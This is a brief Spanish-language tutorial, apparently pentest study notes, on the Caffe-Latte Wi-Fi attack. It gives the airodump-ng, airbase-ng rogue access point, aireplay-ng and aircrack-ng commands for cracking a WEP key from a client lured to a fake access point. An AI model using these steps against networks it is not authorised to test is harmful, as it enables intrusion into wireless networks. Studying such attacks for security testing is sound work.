Caffe-Latte Attack
Ataque usado para la obtención de contraseña. Se engaña un cliente conectado a un AP para que se conecte a uno falso, forzándolo a enviar suficiente tráfico con IVs como para descifrar la contraseña.
Capturar tráfico con Airodump-ng
sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
Crear AP falso con Airbase-ng, reemplazando el nombre del AP falso por el del AP objetivo
sudo airbase-ng --essid "nombre_AP_objetivo" -c <channel_AP> <wifi_interface>
Ejecutar ataque caffe-latte con Aireplay-ng
sudo aireplay-ng --caffe-latte -h <MAC_cliente_objetivo> <wifi_interface>
Crackear contraseña con Aircrack-ng desde fichero con tráfico capturado en Airodump-ng
sudo aircrack-ng –b <MAC_AP> traffic_file.cap